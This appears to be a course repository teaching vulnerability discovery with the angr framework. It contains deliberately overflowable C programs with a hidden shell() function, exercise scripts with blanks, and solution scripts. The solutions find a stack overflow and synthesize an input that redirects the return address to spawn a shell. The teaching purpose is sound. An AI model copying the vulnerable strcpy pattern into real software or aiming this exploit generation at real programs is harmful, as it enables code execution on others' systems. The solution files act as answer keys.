 8 | # 1. The return address is unchanged and pointing to an internal angr hook (i.e., __libc_start_main)
 9 | # 2. The return address is unchanged and pointing inside the program (normal case)
10 | # 3. The return address has been overflowed, and we can point it outside of the program (we'll check for this)
11 | # 4. The return address has been partially overflowed, and still points inside the program (future work)
12 | def state_vuln_filter(state):
13 |     # get the saved instruction pointer from the stack
14 |     pass
15 |     print "Checking saved EIP:", saved_eip
16 | 
17 |     # first, check if the return address points to a hook. If this is intact, then we assume there is no overflow
18 |     pass
19 | 
20 |     # next, create constraints representing an unsafe condition. In this case,
21 |     # let's check if the return address can point *outside* of the program.
22 |     pass
23 | 
24 |     # check if the state is satisfiable with these conditions, and return True if it is
25 |     pass
26 | 
27 | # get a new simulation manager from the project factory
28 | simgr = project.factory.simgr()
29 | 
30 | # initiate a "vuln" stash
31 | simgr.stashes['vuln'] = [ ]
32 | 
33 | # the starting state has no return address on the stack, so it will trigger our vuln filter.
34 | # We can step it until it no longer triggers the filter before starting the actual analysis.
35 | print "Initializing initial state..."
36 | while state_vuln_filter(simgr.active[0]):
37 |     simgr.step()
38 | 
39 | # Now that we are all set up, let's loop until a vulnerable state has been found
40 | print "Searching for the vulnerability!"
41 | while not simgr.vuln:
42 |     # step the simgr
43 |     pass
44 |     # after each step, move all states matching our vuln filter from the active stash to the vuln stash
45 |     pass
46 | 
47 | # now synthesize our crashing input
48 | pass
49 | open("crashing_input", "w").write(crashing_input)
50 | print "You can crash the program by doing:"
51 | print "# cat crashing_input | ./overflow"
52 | 


--------------------------------------------------------------------------------
/vuln_discovery/vuln.solution.py:
--------------------------------------------------------------------------------
 1 | import angr
 2 | 
 3 | # load the binary
 4 | project = angr.Project("overflow", load_options={ 'auto_load_libs': False })
 5 | 
 6 | # Make a simple security checker that checks for an overflow into the return address. There are several cases:
 7 | #
 8 | # 1. The return address is unchanged and pointing to an internal angr hook (i.e., __libc_start_main)
 9 | # 2. The return address is unchanged and pointing inside the program (normal case)
10 | # 3. The return address has been overflowed, and we can point it outside of the program (we'll check for this)
11 | # 4. The return address has been partially overflowed, and still points inside the program (future work)
12 | def state_vuln_filter(state):
13 |     # get the saved instruction pointer from the stack
14 |     saved_eip = state.memory.load(state.regs.ebp + 4, 4, endness="Iend_LE")
15 |     print "Checking saved EIP:", saved_eip
16 | 
17 |     # first, check if the return address points to a hook. If this is intact, then we assume there is no overflow
18 |     if project.is_hooked(state.se.any_int(saved_eip)):
19 |         return False
20 | 
21 |     # next, create constraints representing an unsafe condition. In this case,
22 |     # let's check if the return address can point *outside* of the program.
23 |     unsafe_constraints = [ state.se.Or(saved_eip < project.loader.min_addr, saved_eip > project.loader.max_addr) ]
24 | 
25 |     # check if the state is satisfiable with these conditions, and return True if it is
26 |     return state.se.satisfiable(extra_constraints=unsafe_constraints)
27 | 
28 | # get a new simulation manager from the project factory
29 | simgr = project.factory.simgr()
30 | 
31 | # initiate a "vuln" stash
32 | simgr.stashes['vuln'] = [ ]
33 | 
34 | # the starting state has no return address on the stack, so it will trigger our vuln filter.
35 | # We can step it until it no longer triggers the filter before starting the actual analysis.
36 | print "Initializing initial state..."
37 | while state_vuln_filter(simgr.active[0]):
38 |     simgr.step()
39 | 
40 | # Now that we are all set up, let's loop until a vulnerable state has been found
41 | print "Searching for the vulnerability!"
42 | while not simgr.vuln:
43 |     # step the simgr
44 |     simgr.step()
45 |     # after each step, move all states matching our vuln filter from the active stash to the vuln stash
46 |     simgr.move('active', 'vuln', filter_func=state_vuln_filter)
47 | 
48 | # now synthesize our crashing input
49 | crashing_input = simgr.vuln[0].state.posix.dumps(0)
50 | open("crashing_input", "w").write(crashing_input)
51 | print "You can crash the program by doing:"
52 | print "# cat crashing_input | ./overflow"
53 | 


--------------------------------------------------------------------------------
/vuln_discovery_2/overflow3-28d8a442fb232c0c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/vuln_discovery_2/overflow3-28d8a442fb232c0c


--------------------------------------------------------------------------------
/vuln_discovery_2/overflow3-28d8a442fb232c0c.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <string.h>
 3 | #include <unistd.h>
 4 | #include <sys/types.h>
 5 | #include "dump_stack.h"
 6 | 
 7 | /*
 8 |  * Goal: Get the program to run this function.
 9 |  */
10 | void shell(void) {
11 |     execl("/bin/sh", "sh", NULL);
12 | }
13 | 
14 | void vuln(char *str) {
15 |     char buf[64];
16 |     strcpy(buf, str);
17 |     dump_stack((void **) buf, 21, (void **) &str);
18 | }
19 | 
20 | int main(int argc, char **argv) {
21 |     if (argc != 2) {
22 |         printf("Usage: buffer_overflow [str]\n");
23 |         return 1;
24 |     }
25 | 
26 |     uid_t euid = geteuid();
27 |     setresuid(euid, euid, euid);
28 |     printf("shell function = %p\n", shell);
29 |     vuln(argv[1]);
30 |     return 0;
31 | }
32 | 


--------------------------------------------------------------------------------
/vuln_discovery_2/overflow3.py:
--------------------------------------------------------------------------------
 1 | import angr
 2 | import claripy
 3 | 
 4 | # load the binary, but the original one this time!
 5 | project = angr.Project("overflow3-28d8a442fb232c0c", load_options={ 'auto_load_libs': False })
 6 | 
 7 | # This time, we will need access to symbols (to figure out where the "shell" function is, for example).
 8 | # Let's generate a CFG to fill in the knowledgebase.
 9 | cfg = project.analyses.CFG()
10 | 
11 | # This binary has some functionality that gives angr trouble. Specifically, the way it uses printf (printing pointers)
12 | # in both main() and dump_stack() is not properly handled by angr's printf SimProcedure. If you try to run this
13 | # code without compensating for that, it will hang (because it will error on all states and keep looping while looking
14 | # for a vuln state). So, to compensate for that, we override printf with a simprocedure that does nothing.
15 | pass
16 | 
17 | # Make a simple security checker that checks for an overflow into the return address. There are several cases:
18 | #
19 | # 1. The return address is unchanged and pointing to an internal angr hook (i.e., __libc_start_main)
20 | # 2. The return address is unchanged and pointing inside the program (normal case)
21 | # 3. The return address has been overflowed, and we can point it outside of the program (we'll check for this)
22 | # 4. The return address has been partially overflowed, and still points inside the program (future work)
23 | def state_vuln_filter(state):
24 |     # get the saved instruction pointer from the stack
25 |     saved_eip = state.memory.load(state.regs.ebp + 4, 4, endness="Iend_LE")
26 |     print "Checking saved EIP:", saved_eip
27 | 
28 |     # first, check if the return address points to a hook. If this is intact, then we assume there is no overflow
29 |     if project.is_hooked(state.se.any_int(saved_eip)):
30 |         return False
31 | 
32 |     # next, create constraints representing an unsafe condition. In this case,
33 |     # let's check if the return address can point *outside* of the program.
34 |     unsafe_constraints = [ state.se.Or(saved_eip < project.loader.min_addr, saved_eip > project.loader.max_addr) ]
35 | 
36 |     # check if the state is satisfiable with these conditions, and return True if it is
37 |     return state.se.satisfiable(extra_constraints=unsafe_constraints)
38 | 
39 | # This time, the initialization is a bit different. The application takes a commandline argument, so we must:
40 | # first, create a symbolic bitvector representing the argument.
41 | # We're interested in the last few bytes (the part that will actually overflow the return address), so make it a
42 | # concatination of 60 concrete bytes and 60 symbolic bytes.
43 | arg = claripy.BVV("A"*60).concat(claripy.BVS("arg", 240))
44 | # next, create a state with this argument
45 | state = project.factory.entry_state(args=['overflow3', arg])
46 | # now, create the simulation manager with that state as the initial state
47 | simgr = project.factory.simgr(state)
48 | 
49 | # initiate a "vuln" stash
50 | simgr.stashes['vuln'] = [ ]
51 | 
52 | # Since we have the address of main in the knowledgebase, let's make a less janky initialization procedure.
53 | print "Initializing initial state..."
54 | while simgr.active[0].addr != project.kb.functions['main'].addr:
55 |     simgr.step()
56 | 
57 | # Now that we are all set up, let's loop until a vulnerable state has been found
58 | print "Searching for the vulnerability!"
59 | while not simgr.vuln:
60 |     # step the simgr
61 |     simgr.step()
62 |     # after each step, move all states matching our vuln filter from the active stash to the vuln stash
63 |     simgr.move('active', 'vuln', filter_func=state_vuln_filter)
64 | 
65 | # Now the fun part starts! Let's add a constraint that sets the overflowed return address to the "shell" function.
66 | # First, grab the stored return address in the vuln state
67 | print "Constraining saved return address!"
68 | vuln_state = simgr.vuln[0]
69 | overwritten_eip = vuln_state.memory.load(vuln_state.regs.ebp + 4, 4, endness="Iend_LE")
70 | print "Overwritten EIP:", overwritten_eip
71 | # Now, let's add a constraint to redirect that return address to the shell function
72 | addr_of_shell = project.kb.functions['shell'].addr
73 | vuln_state.add_constraints(overwritten_eip == addr_of_shell)
74 | 
75 | # and now let's explore the vuln stash until we reach the shell
76 | print "Exploring to 'shell' function."
77 | simgr.explore(stash='vuln', find=addr_of_shell)
78 | 
79 | # now synthesize our pwning input!
80 | pwning_input = simgr.found[0].state.se.any_str(arg)
81 | open("pwning_input", "w").write(pwning_input.split('\0')[0]) # since it's a string arg, we only care up to the first null byte
82 | print "You can crash the program by doing:"
83 | print '# ./overflow3-28d8a442fb232c0c "$(cat pwning_input)"'
84 | 


--------------------------------------------------------------------------------
/vuln_discovery_2/overflow3.solution.py:
--------------------------------------------------------------------------------
 1 | import angr
 2 | import claripy
 3 | 
 4 | # load the binary, but the original one this time!
 5 | project = angr.Project("overflow3-28d8a442fb232c0c", load_options={ 'auto_load_libs': False })
 6 | 
 7 | # This time, we will need access to symbols (to figure out where the "shell" function is, for example).
 8 | # Let's generate a CFG to fill in the knowledgebase.
 9 | cfg = project.analyses.CFG()
10 | 
11 | # This binary has some functionality that gives angr trouble. Specifically, the way it uses printf (printing pointers)
12 | # in both main() and dump_stack() is not properly handled by angr's printf SimProcedure. If you try to run this
13 | # code without compensating for that, it will hang (because it will error on all states and keep looping while looking
14 | # for a vuln state). So, to compensate for that, we override printf with a simprocedure that does nothing.
15 | class DoNothing(angr.SimProcedure):
16 |     def run(self):
17 |         return
18 | 
19 | project.hook(project.kb.functions['printf'].addr, DoNothing)
20 | project.hook(project.kb.functions['dump_stack'].addr, DoNothing)
21 | 
22 | # Make a simple security checker that checks for an overflow into the return address. There are several cases:
23 | #
24 | # 1. The return address is unchanged and pointing to an internal angr hook (i.e., __libc_start_main)
25 | # 2. The return address is unchanged and pointing inside the program (normal case)
26 | # 3. The return address has been overflowed, and we can point it outside of the program (we'll check for this)
27 | # 4. The return address has been partially overflowed, and still points inside the program (future work)
28 | def state_vuln_filter(state):
29 |     # get the saved instruction pointer from the stack
30 |     saved_eip = state.memory.load(state.regs.ebp + 4, 4, endness="Iend_LE")
31 |     print "Checking saved EIP:", saved_eip
32 | 
33 |     # first, check if the return address points to a hook. If this is intact, then we assume there is no overflow
34 |     if project.is_hooked(state.se.any_int(saved_eip)):
35 |         return False
36 | 
37 |     # next, create constraints representing an unsafe condition. In this case,
38 |     # let's check if the return address can point *outside* of the program.
39 |     unsafe_constraints = [ state.se.Or(saved_eip < project.loader.min_addr, saved_eip > project.loader.max_addr) ]
40 | 
41 |     # check if the state is satisfiable with these conditions, and return True if it is
42 |     return state.se.satisfiable(extra_constraints=unsafe_constraints)
43 | 
44 | # This time, the initialization is a bit different. The application takes a commandline argument, so we must:
45 | # first, create a symbolic bitvector representing the argument.
46 | # We're interested in the last few bytes (the part that will actually overflow the return address), so make it a
47 | # concatination of 60 concrete bytes and 60 symbolic bytes.
48 | arg = claripy.BVV("A"*60).concat(claripy.BVS("arg", 240))
49 | # next, create a state with this argument
50 | state = project.factory.entry_state(args=['overflow3', arg])
51 | # now, create the simulation manager with that state as the initial state
52 | simgr = project.factory.simgr(state)
53 | 
54 | # initiate a "vuln" stash
55 | simgr.stashes['vuln'] = [ ]
56 | 
57 | # Since we have the address of main in the knowledgebase, let's make a less janky initialization procedure.
58 | print "Initializing initial state..."
59 | while simgr.active[0].addr != project.kb.functions['main'].addr:
60 |     simgr.step()
61 | 
62 | # Now that we are all set up, let's loop until a vulnerable state has been found
63 | print "Searching for the vulnerability!"
64 | while not simgr.vuln:
65 |     # step the simgr
66 |     simgr.step()
67 |     # after each step, move all states matching our vuln filter from the active stash to the vuln stash
68 |     simgr.move('active', 'vuln', filter_func=state_vuln_filter)
69 | 
70 | # Now the fun part starts! Let's add a constraint that sets the overflowed return address to the "shell" function.
71 | # First, grab the stored return address in the vuln state
72 | print "Constraining saved return address!"
73 | vuln_state = simgr.vuln[0]
74 | overwritten_eip = vuln_state.memory.load(vuln_state.regs.ebp + 4, 4, endness="Iend_LE")
75 | print "Overwritten EIP:", overwritten_eip
76 | # Now, let's add a constraint to redirect that return address to the shell function
77 | addr_of_shell = project.kb.functions['shell'].addr
78 | vuln_state.add_constraints(overwritten_eip == addr_of_shell)
79 | 
80 | # and now let's explore the vuln stash until we reach the shell
81 | print "Exploring to 'shell' function."
82 | simgr.explore(stash='vuln', find=addr_of_shell)
83 | 
84 | # now synthesize our pwning input!
85 | pwning_input = simgr.found[0].state.se.any_str(arg)
86 | open("pwning_input", "w").write(pwning_input.split('\0')[0]) # since it's a string arg, we only care up to the first null byte
87 | print "You can crash the program by doing:"
88 | print '# ./overflow3-28d8a442fb232c0c "$(cat pwning_input)"'
89 | 


--------------------------------------------------------------------------------
/vuln_discovery_simple/overflow3-simplified:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/vuln_discovery_simple/overflow3-simplified


--------------------------------------------------------------------------------
/vuln_discovery_simple/overflow3-simplified.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <string.h>
 3 | #include <unistd.h>
 4 | #include <sys/types.h>
 5 | //#include "dump_stack.h"
 6 | 
 7 | /*
 8 |  * Goal: Get the program to run this function.
 9 |  */
10 | void shell(void) {
11 |     execl("/bin/sh", "sh", NULL);
12 | }
13 | 
14 | void vuln(char *str) {
15 |     char buf[64];
16 |     strcpy(buf, str);
17 |     //dump_stack((void **) buf, 21, (void **) &str);
18 | }
19 | 
20 | int main(int argc, char **argv) {
21 |     if (argc != 2) {
22 |         printf("Usage: buffer_overflow [str]\n");
23 |         return 1;
24 |     }
25 | 
26 |     //uid_t euid = geteuid();
27 |     //setresuid(euid, euid, euid);
28 |     //printf("shell function = %p\n", shell);
29 |     vuln(argv[1]);
30 |     return 0;
31 | }
32 | 


--------------------------------------------------------------------------------
/vuln_discovery_simple/overflow3.py:
--------------------------------------------------------------------------------
 1 | import angr
 2 | import claripy
 3 | 
 4 | # load the binary
 5 | project = angr.Project("overflow3-simplified", load_options={ 'auto_load_libs': False })
 6 | 
 7 | # This time, we will need access to symbols (to figure out where the "shell" function is, for example).
 8 | # Let's generate a CFG to fill in the knowledgebase.
 9 | pass
10 | 
11 | # Make a simple security checker that checks for an overflow into the return address. There are several cases:
12 | #
13 | # 1. The return address is unchanged and pointing to an internal angr hook (i.e., __libc_start_main)
14 | # 2. The return address is unchanged and pointing inside the program (normal case)
15 | # 3. The return address has been overflowed, and we can point it outside of the program (we'll check for this)
16 | # 4. The return address has been partially overflowed, and still points inside the program (future work)
17 | def state_vuln_filter(state):
18 |     # get the saved instruction pointer from the stack
19 |     saved_eip = state.memory.load(state.regs.ebp + 4, 4, endness="Iend_LE")
20 |     print "Checking saved EIP:", saved_eip
21 | 
22 |     # first, check if the return address points to a hook. If this is intact, then we assume there is no overflow
23 |     if project.is_hooked(state.se.any_int(saved_eip)):
24 |         return False
25 | 
26 |     # next, create constraints representing an unsafe condition. In this case,
27 |     # let's check if the return address can point *outside* of the program.
28 |     unsafe_constraints = [ state.se.Or(saved_eip < project.loader.min_addr, saved_eip > project.loader.max_addr) ]
29 | 
30 |     # check if the state is satisfiable with these conditions, and return True if it is
31 |     return state.se.satisfiable(extra_constraints=unsafe_constraints)
32 | 
33 | # This time, the initialization is a bit different. The application takes a commandline argument, so we must:
34 | # first, create a symbolic bitvector representing the argument.
35 | # We're interested in the last few bytes (the part that will actually overflow the return address), so make it a
36 | # concatination of 60 concrete bytes and 60 symbolic bytes.
37 | pass
38 | # next, create a state with this argument
39 | pass
40 | # now, create the simulation manager with that state as the initial state
41 | simgr = project.factory.simgr(state)
42 | 
43 | # initiate a "vuln" stash
44 | simgr.stashes['vuln'] = [ ]
45 | 
46 | # Since we have the address of main in the knowledgebase, let's make a less janky initialization procedure.
47 | print "Initializing initial state..."
48 | while simgr.active[0].addr != project.kb.functions['main'].addr:
49 |     simgr.step()
50 | 
51 | # Now that we are all set up, let's loop until a vulnerable state has been found
52 | print "Searching for the vulnerability!"
53 | while not simgr.vuln:
54 |     # step the simgr
55 |     simgr.step()
56 |     # after each step, move all states matching our vuln filter from the active stash to the vuln stash
57 |     simgr.move('active', 'vuln', filter_func=state_vuln_filter)
58 | 
59 | # Now the fun part starts! Let's add a constraint that sets the overflowed return address to the "shell" function.
60 | # First, grab the stored return address in the vuln state
61 | print "Constraining saved return address!"
62 | vuln_state = simgr.vuln[0]
63 | pass
64 | print "Overwritten EIP:", overwritten_eip
65 | # Now, let's add a constraint to redirect that return address to the shell function
66 | addr_of_shell = project.kb.functions['shell'].addr
67 | pass
68 | 
69 | # and now let's explore the vuln stash until we reach the shell
70 | print "Exploring to 'shell' function."
71 | pass
72 | 
73 | # now synthesize our pwning input!
74 | pass
75 | open("pwning_input", "w").write(pwning_input.split('\0')[0]) # since it's a string arg, we only care up to the first null byte
76 | print "You can crash the program by doing:"
77 | print '# ./overflow3-simplified "$(cat pwning_input)"'
78 | 


--------------------------------------------------------------------------------
/vuln_discovery_simple/overflow3.solution.py:
--------------------------------------------------------------------------------
 1 | import angr
 2 | import claripy
 3 | 
 4 | # load the binary
 5 | project = angr.Project("overflow3-simplified", load_options={ 'auto_load_libs': False })
 6 | 
 7 | # This time, we will need access to symbols (to figure out where the "shell" function is, for example).
 8 | # Let's generate a CFG to fill in the knowledgebase.
 9 | cfg = project.analyses.CFG()
10 | 
11 | # Make a simple security checker that checks for an overflow into the return address. There are several cases:
12 | #
13 | # 1. The return address is unchanged and pointing to an internal angr hook (i.e., __libc_start_main)
14 | # 2. The return address is unchanged and pointing inside the program (normal case)
15 | # 3. The return address has been overflowed, and we can point it outside of the program (we'll check for this)
16 | # 4. The return address has been partially overflowed, and still points inside the program (future work)
17 | def state_vuln_filter(state):
18 |     # get the saved instruction pointer from the stack
19 |     saved_eip = state.memory.load(state.regs.ebp + 4, 4, endness="Iend_LE")
20 |     print "Checking saved EIP:", saved_eip
21 | 
22 |     # first, check if the return address points to a hook. If this is intact, then we assume there is no overflow
23 |     if project.is_hooked(state.se.any_int(saved_eip)):
24 |         return False
25 | 
26 |     # next, create constraints representing an unsafe condition. In this case,
27 |     # let's check if the return address can point *outside* of the program.
28 |     unsafe_constraints = [ state.se.Or(saved_eip < project.loader.min_addr, saved_eip > project.loader.max_addr) ]
29 | 
30 |     # check if the state is satisfiable with these conditions, and return True if it is
31 |     return state.se.satisfiable(extra_constraints=unsafe_constraints)
32 | 
33 | # This time, the initialization is a bit different. The application takes a commandline argument, so we must:
34 | # first, create a symbolic bitvector representing the argument.
35 | # We're interested in the last few bytes (the part that will actually overflow the return address), so make it a
36 | # concatination of 60 concrete bytes and 60 symbolic bytes.
37 | arg = claripy.BVV("A"*60).concat(claripy.BVS("arg", 240))
38 | # next, create a state with this argument
39 | state = project.factory.entry_state(args=['overflow3', arg])
40 | # now, create the simulation manager with that state as the initial state
41 | simgr = project.factory.simgr(state)
42 | 
43 | # initiate a "vuln" stash
44 | simgr.stashes['vuln'] = [ ]
45 | 
46 | # Since we have the address of main in the knowledgebase, let's make a less janky initialization procedure.
47 | print "Initializing initial state..."
48 | while simgr.active[0].addr != project.kb.functions['main'].addr:
49 |     simgr.step()
50 | 
51 | # Now that we are all set up, let's loop until a vulnerable state has been found
52 | print "Searching for the vulnerability!"
53 | while not simgr.vuln:
54 |     # step the simgr
55 |     simgr.step()
56 |     # after each step, move all states matching our vuln filter from the active stash to the vuln stash
57 |     simgr.move('active', 'vuln', filter_func=state_vuln_filter)
58 | 
59 | # Now the fun part starts! Let's add a constraint that sets the overflowed return address to the "shell" function.
60 | # First, grab the stored return address in the vuln state
61 | print "Constraining saved return address!"
62 | vuln_state = simgr.vuln[0]
63 | overwritten_eip = vuln_state.memory.load(vuln_state.regs.ebp + 4, 4, endness="Iend_LE")
64 | print "Overwritten EIP:", overwritten_eip
65 | # Now, let's add a constraint to redirect that return address to the shell function
66 | addr_of_shell = project.kb.functions['shell'].addr
67 | vuln_state.add_constraints(overwritten_eip == addr_of_shell)
68 | 
69 | # and now let's explore the vuln stash until we reach the shell
70 | print "Exploring to 'shell' function."
71 | simgr.explore(stash='vuln', find=addr_of_shell)
72 | 
73 | # now synthesize our pwning input!
74 | pwning_input = simgr.found[0].se.any_str(arg)
75 | open("pwning_input", "w").write(pwning_input.split('\0')[0]) # since it's a string arg, we only care up to the first null byte
76 | print "You can crash the program by doing:"
77 | print '# ./overflow3-simplified "$(cat pwning_input)"'
78 | 


--------------------------------------------------------------------------------